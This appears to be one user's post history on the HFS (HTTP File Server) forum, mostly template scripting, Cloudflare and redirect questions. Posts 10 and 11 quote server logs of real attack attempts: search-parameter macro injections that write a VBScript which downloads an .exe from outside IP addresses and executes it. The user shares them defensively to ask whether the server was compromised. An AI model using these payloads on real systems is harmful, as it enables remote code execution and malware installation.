Messages

1

HFS ~ HTTP File Server / Re: Ban IP using cloudflare

« on: November 12, 2023, 05:25:24 AM »

Your best option is to allow not * but just the IPs of cloudflare.

If anyone wonders how to do it... here's a ready-made solution (comes with no warranty)

Just add one ban rule for this IP mask and tick "disconnect with no reply"

Code: [Select]

\173.245.48.1-173.245.63.254;103.21.244.1-103.21.247.254;103.22.200.1-103.22.203.254;103.31.4.1-103.31.7.254;141.101.64.1-141.101.127.254;108.162.192.1-108.162.255.254;190.93.240.1-190.93.255.254;188.114.96.1-188.114.111.254;197.234.240.1-197.234.243.254;198.41.128.1-198.41.255.254;162.158.0.1-162.159.255.254;104.16.0.1-104.23.255.254;104.24.0.1-104.27.255.254;172.64.0.1-172.71.255.254;131.0.72.10-131.0.75.254Source: https://www.cloudflare.com/ips/

Works for me I believe

2

HFS ~ HTTP File Server / Re: decodeuri doesn't always work correctly, how can I fix?

« on: September 08, 2023, 06:11:07 PM »

Did you try removing the decodeuri? like this
{.exists|%item-folder%%item-url%.jpg .}

Yes, it's even worse, almost no pics appear.

but command "exists" works both with url and with path on disk, so you can also try
{.exists|%item-resource%.jpg .}
or something like this, i'm not sure if item-resource has a final \

Yes it does: {.exists|%item-resource%\.jpg.} - this one works perfectly, thank you.

You can contact me on telegram or gmail chat, and we can have a closer look at what you need

Telegram - @rejetto ?

3

HFS ~ HTTP File Server / Re: decodeuri doesn't always work correctly, how can I fix?

« on: September 08, 2023, 03:54:30 PM »

ok but what do you see on "bad" folders ?

Nothing at all.

if you want I can try to help you with that

How?

4

HFS ~ HTTP File Server / Re: decodeuri doesn't always work correctly, how can I fix?

« on: September 08, 2023, 03:38:28 PM »

The easier way is to have {.decodeuri|%item-url%.} duplicated, after your code. That should make it visible.

Only worked for already good folders.

Did you consider using HFS 3?

What scares me is that I'll need to rebuild everything from scratch.

5

HFS ~ HTTP File Server / decodeuri doesn't always work correctly, how can I fix?

« on: September 08, 2023, 12:45:02 PM »

I am using a script for displaying folder previews

Code: [Select]

{. if|{. exists|%item-folder%{.decodeuri|%item-url%.}.jpg .}| <img src="%item-url%.jpg" /> |  .}It doesn't work for some folders using cyrillic names. What can I do about it?

6

Bug reports / A question about HFS v2.3m vulnerability

« on: July 25, 2023, 05:00:40 AM »

https://www.cvedetails.com/cve/CVE-2020-13432/

rejetto HFS (aka HTTP File Server) v2.3m Build #300, when virtual files or folders are used, allows remote attackers to trigger an invalid-pointer write access violation via concurrent HTTP requests with a long URI or long HTTP headers.

Confidentiality Impact: None (There is no impact to the confidentiality of the system.)
Integrity Impact: None (There is no impact to the integrity of the system)
Availability Impact: Partial (There is reduced performance or interruptions in resource availability.)
Access Complexity: Low (Specialized access conditions or extenuating circumstances do not exist. Very little knowledge or skill is required to exploit. )
Authentication: Not required (Authentication is not required to exploit the vulnerability.)

If I read it correctly, this is a DoS solution that can't deal real damage, such as remote code execution?

Which HFS version is more secure (2.3m / 2.4 / 3.0)? Logically, not the beta versions, but they may have some vulnernabilities patched, I guess.

7

HFS ~ HTTP File Server / How can I set up a simple redirect?

« on: March 23, 2022, 10:36:58 AM »

www.example.com/123/321.jpg
should be redirected to
www.example.com/000/321.jpg
and same with all files in /123/

is this possible?

8

HFS ~ HTTP File Server / Re: Can someone tell me how to setup domain with cloudflare?

« on: March 23, 2022, 10:35:16 AM »

It's easy:
1) Purchase domain (the one with cheapest renewal price I found is .download on porkbun)
2) Register on cloudflare, add your site, you will be given 2 nameservers
3) Go to your registrar where you purchased your domain and replace stock nameservers with cloudflare ones
Done.

Remember that cloudflare has 1 serious limit - users can't UPLOAD more than 100 mb to you.

9

HFS ~ HTTP File Server / Request login/password but accept any

« on: December 17, 2021, 12:11:13 PM »

Is this possible? I found option "accept any login for unprotected resources" but can't get it to work.

10

Bug reports / Re: Possible vulnerability

« on: December 14, 2021, 02:17:07 PM »

Here we go again, this time a little different:

Code: [Select]

14.12.2021 18:53:18 154.55.133.183:50174 Requested GET /?search=> dim bStrm: Set bStrm = createobject("Adodb.Stream")
> xHttp.Open "GET", "http://154.55.133.183/1.exe", False
> xHttp.Send
>
> with bStrm
>     .type = 1 '//binary
>     .open
>     .write xHttp.responseBody
>     .savetofile "C:\Users\Public\1.exe", 2 '//overwrite
> end with.}
14.12.2021 18:53:37 154.55.133.183:51758 Requested GET /?search=14.12.2021 18:54:03 154.55.133.183:53636 Requested GET /?search=14.12.2021 18:54:23 154.55.133.183:54859 Requested GET /?search=Still nothing to worry about? Fixed in 2.3m?

11

Bug reports / Possible vulnerability

« on: December 11, 2021, 04:34:32 AM »

Since yesterday, someone is trying to pull code injection on me    I'm on 2.3m
I'm not sure if I got hacked, I found no such files and my AV only quarantined the logs (scanned the link perhaps)
Is there a way to disable /?search functionality completely? I'm not using it anyway

Code: [Select]

10.12.2021 6:55:41 36.46.149.98 53274 Requested GET /?search= {.exec|C:\Users\Public\1.exe.}
10.12.2021 6:55:45 36.46.149.98 53556 Requested GET /?search= {.exec|C:\Users\Public\1.exe.}
10.12.2021 7:01:28 36.46.149.98 57608 Requested GET /
10.12.2021 7:01:28 36.46.149.98 57640 Requested GET /?search= {.save|C:\Users\Public\script.vbs|dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP")
> dim bStrm: Set bStrm = createobject("Adodb.Stream")
> xHttp.Open "GET", "http://103.144.2.108:8888/1.exe", False
> xHttp.Send
>
> with bStrm
>     .type = 1 '//binary
>     .open
>     .write xHttp.responseBody
>     .savetofile "C:\Users\Public\1.exe", 2 '//overwrite
> end with.}


Code: [Select]

10.12.2021 6:55:36 36.46.149.98 52884 Requested GET /
10.12.2021 6:55:37 36.46.149.98 52917 Requested GET /?search= {.save|C:\Users\Public\script.vbs|dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP")
> dim bStrm: Set bStrm = createobject("Adodb.Stream")
> xHttp.Open "GET", "http://103.144.2.108:8888/1.exe", False
> xHttp.Send
>
> with bStrm
>     .type = 1 '//binary
>     .open
>     .write xHttp.responseBody
>     .savetofile "C:\Users\Public\1.exe", 2 '//overwrite
> end with.}


Code: [Select]

11.12.2021 8:08:23 180.76.141.125 55846 Requested GET /
11.12.2021 8:08:24 180.76.141.125 55874 Requested GET /?search= {.save|C:\Users\Public\script.vbs|dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP")
> dim bStrm: Set bStrm = createobject("Adodb.Stream")
> xHttp.Open "GET", "http://103.144.2.108:8888/skol.exe", False
> xHttp.Send
>
> with bStrm
>     .type = 1 '//binary
>     .open
>     .write xHttp.responseBody
>     .savetofile "C:\Users\Public\skol.exe", 2 '//overwrite
> end with.}
11.12.2021 8:08:29 180.76.141.125 56070 Requested GET /?search= {.exec|C:\Users\Public\skol.exe.}
11.12.2021 8:08:32 180.76.141.125 56194 Requested GET /?search= {.exec|C:\Users\Public\skol.exe.}


12

HTML & templates / Re: Custom folder previews

« on: October 28, 2021, 06:31:11 AM »

The question is still relevant, can someone help, please?

13

HFS ~ HTTP File Server / Re: Why file system cleared?

« on: October 04, 2021, 07:25:25 AM »

Same, and my backup got overwritten by autosave

14

Bug reports / False errors on upload

« on: September 16, 2021, 10:54:00 PM »

They only appear in logs. I'm using HFS 2.3m

Code: [Select]

Upload failed for 20210916_221111.jpg: Not allowed.
Upload failed 20210916_221111.jpg
Upload failed for 20210916_221155.jpg: Not allowed.
Upload failed 20210916_221155.jpg
Upload failed for 20210916_221259.jpg: Not allowed.
Upload failed 20210916_221259.jpg
Requested POST /
Uploading 20210916_221111.jpg
Fully uploaded 20210916_221111.jpg - 71.2 K @ 316.4 KB/s
Uploading 20210916_221155.jpg
Fully uploaded 20210916_221155.jpg - 114.0 K @ 797.2 KB/s
Uploading 20210916_221259.jpg
Fully uploaded 20210916_221259.jpg - 163.8 K @ 1.1 MB/s

15

HTML & templates / Re: Custom folder previews

« on: September 15, 2021, 10:07:34 AM »

for hfs2.4

Thanks. How can I move these images into Hits column?